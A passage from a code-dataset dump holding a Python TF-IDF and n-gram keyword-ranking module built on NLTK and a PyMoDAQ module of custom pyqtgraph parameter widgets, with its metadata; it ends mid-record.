{"api_name": "numpy.array", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.ma.masked_invalid", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 181, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 183, "usage_type": "name"}, {"api_name": "numpy.datetime64", "line_number": 183, "usage_type": "name"}, {"api_name": "numpy.nanpercentile", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.colors.LogNorm", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 226, "usage_type": "call"}]} +{"seq_id": "456207534", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# from nltk.tokenize import WordPunctTokenizer\nfrom nltk.text import TextCollection\nfrom nltk import ngrams, FreqDist\nimport math\n\n\n# 构造tf-idf corpus (word为单位)\ndef get_corpus_word(all_abs):\n all_abs = [abs.split(' ') for abs in all_abs] # 对所有摘要分词\n corpus = TextCollection(all_abs)\n return corpus\n\n\n# 计算一篇摘要的所有词的tf-idf (以word为单位)\ndef tf_idf_abs(abstract, corpus):\n # abstract = set(abstract.split(' ')) # 对摘要分词\n abstract = set(abstract)\n tf_idf_list = [corpus.tf_idf(word, abstract) for word in abstract]\n return tf_idf_list\n\n\n# 计算n篇摘要的所有词的tf-idf (以word为单位)\ndef tf_idf_abs_all(all_abstract, corpus):\n all_tf_idf = [tf_idf_abs(abs, corpus) for abs in all_abstract]\n return all_tf_idf\n\n # tokenzer = WordPunctTokenizer()\n # all_abstract = [tokenzer.tokenize(abs) for abs in all_abstract] # ��所有摘要分词\n # for abs in all_abstract:\n # tf_idf_list = []\n # for word in abs:\n # # tf = corpus.tf(word,corpus)\n # # idf = corpus.idf(word)\n # tf_idf = corpus.tf_idf(word,corpus)\n # # print(word,': tf=',tf,' idf=',idf,' tf-idf=',tf_idf)\n # tf_idf_list.append(tf_idf)\n # # all_tf_idf.append([abs,tf_idf_list])\n # all_tf_idf.append(tf_idf_list)\n # return all_tf_idf\n\n\n# 统计一篇文档的关键词(整个词组)的tf—idf corpus以word为单位\ndef tf_idf_kw(keywords, corpus):\n tf_idf_dict = {}\n for kw in keywords:\n tf_idf = corpus.tf_idf(kw,corpus)\n tf_idf_dict.update({kw : tf_idf})\n return tf_idf_dict\n\n\n# n_gram\n# 获取单文本的n_gram\n# text:分词后的结果\ndef n_gram(text,n):\n # text = text.split(' ')\n n_grams = ngrams(text,n)\n return [n_gram for n_gram in n_grams]\n\n\n# 获取n篇摘要的n_gram\ndef get_n_gram_list(abs_list, n):\n return [n_gram(abs,n) for abs in abs_list]\n\n\n# 构造corpus n_gram\ndef get_corpus_ngram(n_gram_list):\n return TextCollection(n_gram_list)\n\n\n# 计算一篇摘要的所有词的tf-idf (以n_gram为单位)\ndef tf_idf_abs_n_gram(abs_n_grams, corpus_ngram):\n # for n_gram in set(abs_n_grams):\n # tfidf = corpus_ngram.tf_idf(n_gram,abs_n_grams)\n # print(n_gram,': ', tfidf )\n return [corpus_ngram.tf_idf(n_gram, abs_n_grams) for n_gram in set(abs_n_grams)]\n\n\n\n# 计算n篇摘要的所有词的tf-idf (以n_gram为单位)\ndef tf_idf_abs_all_n_gram(abs_n_gram_list, corpus_ngram):\n return [tf_idf_abs_n_gram(abs_n_grams,corpus_ngram) for abs_n_grams in abs_n_gram_list]\n\n\n# 统计一篇文档的关键词(整个词组)的tf—idf corpus以n_gram为单位\n# ('This', 'paper') ======kw处理成这种格式\ndef tf_idf_kw_n_gram(keywords, corpus_ngram):\n tf_idf_dict = {}\n for kw in keywords:\n kw = tuple([term for term in kw.split(' ')])\n tf_idf = corpus_ngram.tf_idf(kw,corpus_ngram)\n tf_idf_dict.update({kw : tf_idf})\n return tf_idf_dict\n\n\n#  获取一篇文档的关键词在摘要中的tf-idf排名\ndef get_kw_rank(kw_tfidf_dict, tf_idf_abs):\n kw_rank_dict = {}\n # abstract中词的tf - idf去重\n tf_idf_abs = list(set(tf_idf_abs))\n # abstract中词的tf-idf值降序排序\n tf_idf_abs.sort(reverse=True)\n for keyword in kw_tfidf_dict:\n rank = 0\n kw_tfidf = kw_tfidf_dict.get(keyword)\n if kw_tfidf not in tf_idf_abs:\n for tfidf in tf_idf_abs:\n if tfidf > kw_tfidf:\n continue\n else:\n rank = tf_idf_abs.index(tfidf) + 1 #  取第一个比关键词小的index+1作为其rank\n break\n else:\n rank = tf_idf_abs.index(kw_tfidf) + 1\n kw_rank_dict.update({keyword: rank})\n return kw_rank_dict\n\n\n#  获取n篇文档的关键词在摘要中的tf-idf排名\ndef get_kw_rank_all(kw_tfidf_dict_list,tf_idf_abs_list):\n for i in range(len(kw_tfidf_dict_list)):\n try:\n get_kw_rank(kw_tfidf_dict_list[i], tf_idf_abs_list[i])\n except ValueError :\n print(kw_tfidf_dict_list[i])\n print(tf_idf_abs_list[i])\n\n return [get_kw_rank(kw_tfidf_dict_list[i], tf_idf_abs_list[i]) for i in range(len(tf_idf_abs_list))]\n\n\n# 获取n篇abstract的tfidf set的长度\ndef get_abs_tfidf_set_num(tf_idf_abs_list):\n return [len(set(tfidf_abs)) for tfidf_abs in tf_idf_abs_list]\n\n\n\n# 自定义tf-idf\n# # 以n_gram为单位计算tf\n# def tf(word, n_grams):\n# count = FreqDist(n_grams)\n# return count[word] / sum(count.values())\n#\n#\n# # 以n_gram为单位计算df\n# def n_containing(word, n_gram_list):\n# count_list = [FreqDist(n_grams) for n_grams in n_gram_list]\n# return sum(1 for count in count_list if word in count)\n#\n#\n# # 以n_gram为单位计算idf\n# def idf(word, n_gram_list):\n# count_list = [FreqDist(n_grams) for n_grams in n_gram_list]\n# return math.log(len(count_list) / (1 + n_containing(word, count_list)))\n#\n# # 以n_gram为单位计算tf-idf\n# def tfidf(word, n_grams, n_gram_list):\n# return tf(word, n_grams) * idf(word, n_gram_list)\n#\n#\n# # 计算一篇摘要的所有词的tf-idf (以n_gram为单位)\n# def tf_idf_abs_n_gram(abs_n_grams, abs_n_gram_list):\n# return [tfidf(n_gram, abs_n_grams, abs_n_gram_list) for n_gram in abs_n_grams]\n#\n#\n# # 计算n篇摘要的所有词的tf-idf (以n_gram为单位)\n# def tf_idf_abs_all_n_gram(abs_n_gram_list):\n# return [tf_idf_abs_n_gram(abs_n_grams,abs_n_gram_list) for abs_n_grams in abs_n_gram_list]\n#\n#\n# # 统计一篇文档的关键词(整个词组)的tf—idf corpus以n_gram为单位\n# def tf_idf_kw_n_gram(keywords, abs_n_grams,abs_n_gram_list):\n# tf_idf_dict = {}\n# for kw in keywords:\n# tf_idf = tfidf(kw,abs_n_grams,abs_n_gram_list)\n# tf_idf_dict.update({kw : tf_idf})\n# return tf_idf_dict", "sub_path": "static_count/tf_idf.py", "file_name": "tf_idf.py", "file_ext": "py", "file_size_in_byte": 5906, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "nltk.text.TextCollection", "line_number": 12, "usage_type": "call"}, {"api_name": "nltk.ngrams", "line_number": 58, "usage_type": "call"}, {"api_name": "nltk.text.TextCollection", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "50380483", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 4 10:59:53 2017\n\n@author: Weber\n\n\"\"\"\nimport sys\nfrom qtpy import QtWidgets, QtGui\nfrom qtpy.QtCore import Slot, Signal, Qt, QDate, QDateTime, QTime, QByteArray, QSize\nfrom pyqtgraph.widgets import ColorButton, SpinBox\nimport pyqtgraph.parametertree.parameterTypes as pTypes\nfrom pyqtgraph.parametertree import Parameter, ParameterItem\nfrom pyqtgraph.parametertree.Parameter import registerParameterType\nfrom pyqtgraph import functions as fn\nfrom pyqtgraph.colormap import ColorMap\nfrom pymodaq.daq_utils.daq_utils import scroll_log, scroll_linear\nfrom collections import OrderedDict\nfrom decimal import Decimal as D\n\nfrom pymodaq.daq_utils.gui_utils.widgets import QLED\n\nfrom pathlib import Path\nimport numpy as np\nimport os\n\n\nclass GroupParameterItemCustom(pTypes.GroupParameterItem):\n \"\"\"\n | Group parameters are used mainly as a generic parent item that holds (and groups!) a set of child parameters. It also provides a simple mechanism for displaying a button or combo that can be used to add new parameters to the group.\n |\n | This customization is made in order to respond to the visible options.\n | Overwrite the optsChanged method from GroupParameterItem class.\n\n \"\"\"\n\n def __init__(self, param, depth):\n pTypes.GroupParameterItem.__init__(self, param, depth)\n\n def optsChanged(self, param, changed):\n if 'addList' in changed:\n self.updateAddList()\n elif 'visible' in changed:\n self.setHidden(not changed['visible'])\n\n\nclass GroupParameterCustom(pTypes.GroupParameter):\n \"\"\"\n |\n | Group parameters are used mainly as a generic parent item that holds (and groups!) a set of child parameters.\n |\n | It also provides a simple mechanism for displaying a button or combo that can be used to add new parameters to the group.\n |\n | To enable this, the group must be initialized with the 'addText' option (the text will be displayed on a button which, when clicked, will cause addNew() to be called).\n |\n | If the 'addList' option is specified as well, then a dropdown-list of addable items will be displayed instead of a button.\n |\n\n ============== ========================================\n **Attributes** **Type**\n itemClass instance of GroupParameterItemCustom\n ============== ========================================\n \"\"\"\n itemClass = GroupParameterItemCustom\n\n\nregisterParameterType('group', GroupParameterCustom, override=True)\n\n\nclass SpinBoxCustom(SpinBox.SpinBox):\n def __init__(self, parent=None, value=0.0, **kwargs):\n super().__init__(parent, value, **kwargs)\n\n def setOpts(self, **opts):\n \"\"\"\n Overriden class to add the field visible in the options.\n\n =============== =========== ======================\n **Parameters** **Type** **Description**\n *opts* string the vararg options\n =============== =========== ======================\n \"\"\"\n # print opts\n for k in opts:\n if k == 'bounds' or k == 'limits':\n self.setMinimum(opts[k][0], update=False)\n self.setMaximum(opts[k][1], update=False)\n elif k == 'min':\n self.setMinimum(opts[k], update=False)\n elif k == 'max':\n self.setMaximum(opts[k], update=False)\n elif k in ['step', 'minStep']:\n self.opts[k] = D(str(opts[k]))\n elif k == 'value':\n pass # # don't set value until bounds have been set\n elif k == 'visible':\n self.setVisible(opts[k])\n elif k == 'readonly':\n self.setReadOnly(opts[k])\n elif k == 'enabled':\n self.setEnabled(opts[k])\n elif k == 'format':\n self.opts[k] = opts[k]\n elif k in self.opts:\n self.opts[k] = opts[k]\n elif 'tip' in k:\n self.opts[k] = opts[k]\n self.setToolTip(opts[k])\n if 'value' in opts:\n self.setValue(opts['value'])\n\n # # If bounds have changed, update value to match\n if 'bounds' in opts and 'value' not in opts:\n self.setValue()\n\n # # sanity checks:\n if self.opts['int']:\n if 'step' in opts:\n step = opts['step']\n # # not necessary..\n # if int(step) != step:\n # raise Exception('Integer SpinBox must have integer step size.')\n else:\n self.opts['step'] = int(self.opts['step'])\n\n if 'minStep' in opts:\n step = opts['minStep']\n if int(step) != step:\n raise Exception('Integer SpinBox must have integer minStep size.')\n else:\n ms = int(self.opts.get('minStep', 1))\n if ms < 1:\n ms = 1\n self.opts['minStep'] = ms\n\n if 'delay' in opts:\n self.proxy.setDelay(opts['delay'])\n\n self.updateText()\n\n\nclass Pixmap_check(QtWidgets.QWidget):\n \"\"\" value of this parameter is a dict with checked, data for the pixmap and optionally path in h5 node\n \"\"\"\n\n # valuechanged=Signal(dict)\n\n def __init__(self):\n\n super().__init__()\n self.path = ''\n self.data = None\n self.checked = False\n self.initUI()\n\n def initUI(self):\n \"\"\"\n Init the User Interface.\n \"\"\"\n self.ver_layout = QtWidgets.QVBoxLayout()\n self.label = QtWidgets.QLabel()\n self.checkbox = QtWidgets.QCheckBox('Show/Hide')\n self.info = QtWidgets.QLineEdit()\n self.info.setReadOnly(True)\n self.checkbox.setChecked(False)\n self.ver_layout.addWidget(self.label)\n self.ver_layout.addWidget(self.info)\n self.ver_layout.addWidget(self.checkbox)\n self.ver_layout.setSpacing(0)\n self.ver_layout.setContentsMargins(0, 0, 0, 0)\n self.setLayout(self.ver_layout)\n\n def setValue(self, dic):\n if 'data' in dic:\n if not isinstance(dic['data'], QtGui.QPixmap):\n self.data = QByteArray(dic['data'])\n im = QtGui.QImage.fromData(self.data)\n a = QtGui.QPixmap.fromImage(im)\n else:\n a = dic['data']\n else:\n a = dic['pixmap']\n if 'path' in dic:\n self.path = dic['path']\n else:\n self.path = ''\n if 'info' in dic:\n info = dic['info']\n else:\n info = ''\n self.label.setPixmap(a)\n self.checkbox.setChecked(dic['checked'])\n self.info.setText(info)\n # self.valuechanged.emit(dic)\n\n def value(self):\n return dict(pixmap=self.label.pixmap(), checked=self.checkbox.isChecked(), path=self.path)\n\n\nclass QTimeCustom(QtWidgets.QTimeEdit):\n def __init__(self, *args, **kwargs):\n super(QTimeCustom, self).__init__(*args, **kwargs)\n self.minutes_increment = 1\n self.timeChanged.connect(self.updateTime)\n\n def setTime(self, time):\n hours = time.hour()\n minutes = time.minute()\n\n minutes = int(np.round(minutes / self.minutes_increment) * self.minutes_increment)\n if minutes == 60:\n minutes = 0\n hours += 1\n\n time.setHMS(hours, minutes, 0)\n\n return super(QTimeCustom, self).setTime(time)\n\n def setMinuteIncrement(self, minutes_increment):\n self.minutes_increment = minutes_increment\n self.updateTime(self.time())\n\n @Slot(QTime)\n def updateTime(self, time):\n self.setTime(time)\n\n\nclass SliderSpinBox(QtWidgets.QWidget):\n\n def __init__(self, *args, subtype='lin', **kwargs):\n\n super().__init__()\n self.subtype = subtype\n self.initUI(*args, **kwargs)\n\n self.valueChanged = self.spinbox.valueChanged # (value) for compatibility with QSpinBox\n self.sigValueChanged = self.spinbox.sigValueChanged # (self)\n self.sigValueChanging = self.spinbox.sigValueChanging # (self, value) sent immediately; no delay.\n\n @property\n def opts(self):\n return self.spinbox.opts\n\n @opts.setter\n def opts(self, **opts):\n self.setOpts(**opts)\n\n def setOpts(self, **opts):\n self.spinbox.setOpts(**opts)\n if 'visible' in opts:\n self.slider.setVisible(opts['visible'])\n\n def insert_widget(self,widget, row=0):\n self.vlayout.insertWidget(row, widget)\n\n def initUI(self, *args, **kwargs):\n \"\"\"\n Init the User Interface.\n \"\"\"\n self.vlayout = QtWidgets.QVBoxLayout()\n self.slider = QtWidgets.QSlider(Qt.Horizontal)\n self.slider.setMinimumWidth(50)\n self.slider.setMinimum(0)\n self.slider.setMaximum(100)\n if 'value' in kwargs:\n value = kwargs.pop('value')\n else:\n if 'bounds' in kwargs:\n value = kwargs['bounds'][0]\n else:\n value = 1\n self.spinbox = SpinBoxCustom(parent=None, value=value, **kwargs)\n\n self.vlayout.addWidget(self.slider)\n self.vlayout.addWidget(self.spinbox)\n self.vlayout.setSpacing(0)\n self.vlayout.setContentsMargins(0, 0, 0, 0)\n self.setLayout(self.vlayout)\n\n self.slider.valueChanged.connect(self.update_spinbox)\n self.spinbox.valueChanged.connect(self.update_slide)\n\n def update_spinbox(self, val):\n \"\"\"\n val is a percentage [0-100] used in order to set the spinbox value between its min and max\n \"\"\"\n min_val = float(self.opts['bounds'][0])\n max_val = float(self.opts['bounds'][1])\n if self.subtype == 'log':\n val_out = scroll_log(val, min_val, max_val)\n else:\n val_out = scroll_linear(val, min_val, max_val)\n try:\n self.slider.valueChanged.disconnect(self.update_spinbox)\n self.spinbox.valueChanged.disconnect(self.update_slide)\n except Exception:\n pass\n self.spinbox.setValue(val_out)\n\n self.slider.valueChanged.connect(self.update_spinbox)\n self.spinbox.valueChanged.connect(self.update_slide)\n\n def update_slide(self, val):\n \"\"\"\n val is the spinbox value between its min and max\n \"\"\"\n min_val = float(self.opts['bounds'][0])\n max_val = float(self.opts['bounds'][1])\n\n try:\n self.slider.valueChanged.disconnect(self.update_spinbox)\n self.spinbox.valueChanged.disconnect(self.update_slide)\n except Exception:\n pass\n self.slider.setValue(int((val - min_val) / (max_val - min_val) * 100))\n self.slider.valueChanged.connect(self.update_spinbox)\n self.spinbox.valueChanged.connect(self.update_slide)\n\n def setValue(self, val):\n self.spinbox.setValue(val)\n\n def value(self):\n return self.spinbox.value()\n\n\nclass WidgetParameterItem(pTypes.WidgetParameterItem):\n \"\"\"\n This is a subclass of widget parameteritem in order to deal with the visiblily of the spinbox when parameter visibility os toggled.\n \"\"\"\n\n def __init__(self, param, depth):\n pTypes.WidgetParameterItem.__init__(self, param, depth)\n if 'enabled' in self.param.opts:\n self.displayLabel.setEnabled(self.param.opts['enabled'])\n\n def makeWidget(self):\n \"\"\"\n | Return a single widget that should be placed in the second tree column.\n | The widget must be given three attributes:\n\n ========== ============================================================\n sigChanged a signal that is emitted when the widget's value is changed\n value a function that returns the value\n setValue a function that sets the value\n ========== ============================================================\n\n | This is a good function to override in subclasses.\n\n \"\"\"\n opts = self.param.opts\n t = opts['type']\n if t in ('int', 'float', 'slide'):\n defs = {\n 'value': 0, 'min': None, 'max': None,\n 'step': 1.0, 'dec': False,\n 'siPrefix': False, 'suffix': '', 'decimals': 12,\n }\n if t == 'int':\n defs['int'] = True\n defs['minStep'] = 1.0\n for k in defs:\n if k in opts:\n defs[k] = opts[k]\n if 'limits' in opts:\n defs['bounds'] = opts['limits']\n if t in ('int', 'float'):\n w = SpinBoxCustom()\n else:\n if 'subtype' not in opts:\n opts['subtype'] = 'linear'\n if 'limits' not in opts:\n defs['bounds'] = (0., self.param.value()) #max value set to default value when no max given\n else:\n defs['bounds'] = opts['limits']\n\n w = SliderSpinBox(subtype=opts['subtype'], bounds=defs['bounds'], value=defs['value'])\n self.setSizeHint(1, QSize(50, 50))\n\n\n w.setOpts(**defs)\n w.sigChanged = w.sigValueChanged\n w.sigChanging = w.sigValueChanging\n\n elif t == 'bool':\n w = QtWidgets.QCheckBox()\n w.sigChanged = w.toggled\n w.value = w.isChecked\n w.setValue = w.setChecked\n w.setEnabled(not opts.get('readonly', False))\n self.hideWidget = False\n elif t == 'bool_push':\n w = QtWidgets.QPushButton()\n if 'label' in opts:\n w.setText(opts['label'])\n elif 'title' in opts:\n w.setText(opts['title'])\n else:\n w.setText(opts['name'])\n # w.setMaximumWidth(50)\n w.setCheckable(True)\n w.sigChanged = w.toggled\n w.value = w.isChecked\n w.setValue = w.setChecked\n w.setEnabled(not opts.get('readonly', False))\n self.hideWidget = False\n elif t == 'led_push':\n w = QLED()\n w.clickable = True\n w.set_as_false()\n w.sigChanged = w.value_changed\n w.value = w.get_state\n w.setValue = w.set_as\n self.hideWidget = False\n elif t == 'str':\n w = QtWidgets.QLineEdit()\n w.sigChanged = w.editingFinished\n w.value = lambda: str(w.text())\n w.setValue = lambda v: w.setText(str(v))\n w.sigChanging = w.textChanged\n elif t == 'color':\n w = ColorButton.ColorButton()\n w.sigChanged = w.sigColorChanged\n w.sigChanging = w.sigColorChanging\n w.value = w.color\n w.setValue = w.setColor\n self.hideWidget = False\n w.setFlat(True)\n w.setEnabled(not opts.get('readonly', False))\n elif t == 'colormap':\n from pyqtgraph.widgets.GradientWidget import GradientWidget # # need this here to avoid import loop\n w = GradientWidget(orientation='bottom')\n w.sigChanged = w.sigGradientChangeFinished\n w.sigChanging = w.sigGradientChanged\n w.value = w.colorMap\n w.setValue = w.setColorMap\n self.hideWidget = False\n elif t == 'date_time':\n w = QtWidgets.QDateTimeEdit(QDateTime(QDate.currentDate(), QTime.currentTime()))\n w.setCalendarPopup(True)\n if 'format' in opts:\n w.setDisplayFormat(opts['format'])\n else:\n w.setDisplayFormat('dd/MM/yyyy hh:mm')\n w.sigChanged = w.dateTimeChanged\n w.value = w.dateTime\n w.setValue = w.setDateTime\n elif t == 'date':\n w = QtWidgets.QDateEdit(QDate(QDate.currentDate()))\n w.setCalendarPopup(True)\n if 'format' in opts:\n w.setDisplayFormat(opts['format'])\n else:\n w.setDisplayFormat('dd/MM/yyyy')\n w.sigChanged = w.dateChanged\n w.value = w.date\n w.setValue = w.setDate\n\n elif t == 'time':\n w = QTimeCustom(QTime(QTime.currentTime()))\n if 'minutes_increment' in opts:\n w.setMinuteIncrement(opts['minutes_increment'])\n w.setDisplayFormat('hh:mm')\n w.sigChanged = w.timeChanged\n w.value = w.time\n w.setValue = w.setTime\n\n elif t == 'led':\n w = QLED()\n w.clickable = False\n w.set_as_false()\n w.sigChanged = w.value_changed\n w.value = w.get_state\n w.setValue = w.set_as\n elif t == 'pixmap':\n w = QtWidgets.QLabel()\n w.sigChanged = None\n w.value = w.pixmap\n w.setValue = w.setPixmap\n elif t == 'pixmap_check':\n w = Pixmap_check()\n w.sigChanged = w.checkbox.toggled\n w.value = w.value\n w.setValue = w.setValue\n else:\n raise Exception(\"Unknown type '%s'\" % str(t))\n return w\n\n def limitsChanged(self, param, limits):\n \"\"\"Called when the parameter's limits have changed\"\"\"\n ParameterItem.limitsChanged(self, param, limits)\n\n t = self.param.opts['type']\n if t == 'int' or t == 'float' or t == 'slide':\n self.widget.setOpts(bounds=limits)\n else:\n return # don't know what to do with any other types..\n\n def showEditor(self):\n \"\"\"\n Show the widget attribute.\n \"\"\"\n self.widget.show()\n self.displayLabel.hide()\n self.widget.setFocus(Qt.OtherFocusReason)\n if isinstance(self.widget, SpinBox.SpinBox):\n self.widget.selectNumber() # select the numerical portion of the text for quick editing\n\n\n def hideEditor(self):\n \"\"\"\n Hide the widget attribute.\n \"\"\"\n status = 'led' in self.param.opts['type'] or self.param.opts['type'] == 'pixmap'\n status = not (status or self.param.opts['type'] == 'pixmap_check')\n if status:\n self.widget.hide()\n self.displayLabel.show()\n\n def optsChanged(self, param, opts):\n \"\"\"\n | Called when any options are changed that are not name, value, default, or limits.\n |\n | If widget is a SpinBox, pass options straight through.\n | So that only the display label is shown when visible option is toggled.\n\n =============== ================================== ==============================\n **Parameters** **Type** **Description**\n *param* instance of pyqtgraph parameter the parameter to check\n *opts* string list the associated options list\n =============== ================================== ==============================\n\n See Also\n --------\n optsChanged\n \"\"\"\n # print \"opts changed:\", opts\n ParameterItem.optsChanged(self, param, opts)\n\n if 'readonly' in opts:\n self.updateDefaultBtn()\n if isinstance(self.widget, (QtWidgets.QCheckBox, ColorButton.ColorButton)):\n self.widget.setEnabled(not opts['readonly'])\n\n if 'minutes_increment' in opts:\n self.widget.setMinuteIncrement(opts['minutes_increment'])\n\n if 'tip' in opts:\n self.displayLabel.setToolTip(opts['tip'])\n\n # # If widget is a SpinBox, pass options straight through\n if isinstance(self.widget, SpinBoxCustom) or isinstance(self.widget, SliderSpinBox):\n if 'visible' in opts:\n opts.pop('visible')\n self.widget.hide() # so that only the display label is shown when visible option is toggled\n if 'units' in opts and 'suffix' not in opts:\n opts['suffix'] = opts['units']\n self.widget.setOpts(**opts)\n self.updateDisplayLabel()\n\n if 'title' in opts:\n self.setText(0, opts['title']) # void QTreeWidgetItem::setText(int column, const QString &text)\n\n def valueChanged(self, param, val, force=False):\n # # called when the parameter's value has changed\n ParameterItem.valueChanged(self, param, val)\n if self.widget.sigChanged is not None:\n self.widget.sigChanged.disconnect(self.widgetValueChanged)\n\n try:\n if force or val != self.widget.value():\n self.widget.setValue(val)\n self.updateDisplayLabel(val) # # always make sure label is updated, even if values match!\n finally:\n if self.widget.sigChanged is not None:\n self.widget.sigChanged.connect(self.widgetValueChanged)\n self.updateDefaultBtn()\n\n\nclass SimpleParameterCustom(pTypes.SimpleParameter):\n itemClass = WidgetParameterItem\n\n def __init__(self, *args, **kargs):\n pTypes.SimpleParameter.__init__(self, *args, **kargs)\n\n def _interpretValue(self, v):\n fn = {\n 'int': int,\n 'float': float,\n 'bool': bool,\n 'bool_push': bool,\n 'str': str,\n 'color': self._interpColor,\n 'colormap': self._interpColormap,\n 'date_time': QDateTime,\n 'date': QDate,\n 'time': QTime,\n 'led': bool,\n 'led_push': bool,\n 'pixmap': QtWidgets.QLabel,\n 'pixmap_check': dict,\n 'slide': float\n }[self.opts['type']]\n return fn(v)\n\n def _interpColor(self, v):\n return fn.mkColor(v)\n\n def _interpColormap(self, v):\n if not isinstance(v, ColorMap):\n raise TypeError(\"Cannot set colormap parameter from object %r\" % v)\n return v\n\n def setLimits(self, limits):\n \"\"\"Set limits on the acceptable values for this parameter.\n The format of limits depends on the type of the parameter and\n some parameters do not make use of limits at all.\"\"\"\n if 'limits' in self.opts and self.opts['limits'] == limits:\n return\n self.opts['limits'] = limits\n self.sigLimitsChanged.emit(self, limits)\n if self.opts['type'] in ['int', 'float', 'slide']:\n if self.value() > limits[1]:\n self.setValue(limits[1])\n elif self.value() < limits[0]:\n self.setValue(limits[0])\n return limits\n\n\nregisterParameterType('int', SimpleParameterCustom, override=True)\nregisterParameterType('float', SimpleParameterCustom, override=True)\nregisterParameterType('bool', SimpleParameterCustom, override=True)\nregisterParameterType('bool_push', SimpleParameterCustom, override=True)\nregisterParameterType('led_push', SimpleParameterCustom, override=True)\nregisterParameterType('date_time', SimpleParameterCustom, override=True)\nregisterParameterType('date', SimpleParameterCustom, override=True)\nregisterParameterType('time', SimpleParameterCustom, override=True)\nregisterParameterType('led', SimpleParameterCustom, override=True)\nregisterParameterType('pixmap', SimpleParameterCustom, override=True)\nregisterParameterType('pixmap_check', SimpleParameterCustom, override=True)\nregisterParameterType('slide', SimpleParameterCustom, override=True)\n\n\nregisterParameterType('slide', SimpleParameterCustom , override=True)\n\nclass ListParameterItem_custom(pTypes.ListParameterItem):\n \"\"\"\n WidgetParameterItem subclass providing comboBox that lets the user select from a list of options.\n\n \"\"\"\n\n def __init__(self, param, depth):\n super().__init__(param, depth)\n if 'tip' in param.opts:\n self.displayLabel.setToolTip(param.opts['tip'])\n\n def makeWidget(self):\n \"\"\"\n Make a widget from self parameter options, connected to the buttonClicked function.\n\n Returns\n -------\n w:widget\n the initialized widget\n\n See Also\n --------\n buttonClicked, limitsChanged,\n \"\"\"\n opts = self.param.opts\n t = opts['type']\n w = Combo_pb()\n w.add_pb.clicked.connect(self.buttonClicked)\n w.setMaximumHeight(20) # # set to match height of spin box and line edit\n if 'show_pb' in opts:\n w.add_pb.setVisible(opts['show_pb'])\n else:\n w.add_pb.setVisible(False)\n if 'tip' in opts:\n w.setToolTip(opts['tip'])\n w.sigChanged = w.combo.currentIndexChanged\n w.value = self.value\n w.setValue = self.setValue\n self.widget = w # # needs to be set before limits are changed\n self.limitsChanged(self.param, self.param.opts['limits'])\n if len(self.forward) > 0:\n self.setValue(self.param.value())\n return w\n\n def value(self):\n key = str(self.widget.combo.currentText())\n return self.forward.get(key, None)\n\n def setValue(self, val):\n self.targetValue = val\n if val not in self.reverse[0]:\n self.widget.combo.setCurrentIndex(0)\n else:\n key = self.reverse[1][self.reverse[0].index(val)]\n ind = self.widget.combo.findText(key)\n self.widget.combo.setCurrentIndex(ind)\n\n def limitsChanged(self, param, limits):\n \"\"\"\n Set up forward / reverse mappings for {name:value} limits dictionnary.\n\n =============== ================================== ========================================\n **Parameters** **Type** **Description**\n *param* instance of pyqtgraph parameter Not used\n *limits* dictionnary the limits dictionnary to be mapped\n =============== ================================== ========================================\n\n \"\"\"\n\n if len(limits) == 0:\n limits = [''] # # Can never have an empty list--there is always at least a singhe blank item.\n\n self.forward, self.reverse = ListParameter_custom.mapping(limits)\n try:\n self.widget.blockSignals(True)\n val = self.targetValue # asUnicode(self.widget.currentText())\n\n self.widget.combo.clear()\n for k in self.forward:\n self.widget.combo.addItem(k)\n if k == val:\n self.widget.combo.setCurrentIndex(self.widget.count() - 1)\n self.updateDisplayLabel()\n finally:\n self.widget.blockSignals(False)\n\n def buttonClicked(self):\n \"\"\"\n |\n | Append the self limits attributes an added parameter with string value.\n | Update parameter and call the limitschanged method to map the added parameter.\n\n See Also\n --------\n limitsChanged,\n \"\"\"\n if type(self.param.opts['limits']) == list:\n text, ok = QtWidgets.QInputDialog.getText(None, \"Enter a value to add to the parameter\",\n \"String value:\", QtWidgets.QLineEdit.Normal)\n if ok and not (text == \"\"):\n self.param.opts['limits'].append(text)\n self.limitsChanged(self.param, self.param.opts['limits'])\n self.param.setValue(text)\n\n def optsChanged(self, param, opts):\n \"\"\"\n Called when any options are changed that are not name, value, default, or limits.\n\n =============== ================================== =======================================\n **Parameters** **Type** **Description**\n *param* instance of pyqtgraph parameter The parameter to be checked\n *opts* string list The option dictionnary to be checked\n =============== ================================== =======================================\n\n See Also\n --------\n optsChanged\n \"\"\"\n # print \"opts changed:\", opts\n ParameterItem.optsChanged(self, param, opts)\n\n if 'show_pb' in opts:\n self.widget.add_pb.setVisible(opts['show_pb'])\n if 'enabled' in opts:\n self.widget.setEnabled(opts['enabled'])\n\n\nclass ListParameter_custom(pTypes.ListParameter):\n \"\"\"\n =============== =======================================\n **Attributes** **Type**\n *itemClass* instance of ListParameterItem_custom\n *sigActivated* instance of pyqt Signal\n =============== =======================================\n \"\"\"\n itemClass = ListParameterItem_custom\n sigActivated = Signal(object)\n\n def __init__(self, **opts):\n super(ListParameter_custom, self).__init__(**opts)\n\n def activate(self):\n \"\"\"\n Emit the Activated signal.\n \"\"\"\n self.sigActivated.emit(self)\n self.emitStateChanged('activated', None)\n\n\nregisterParameterType('list', ListParameter_custom, override=True)\n\n\nclass 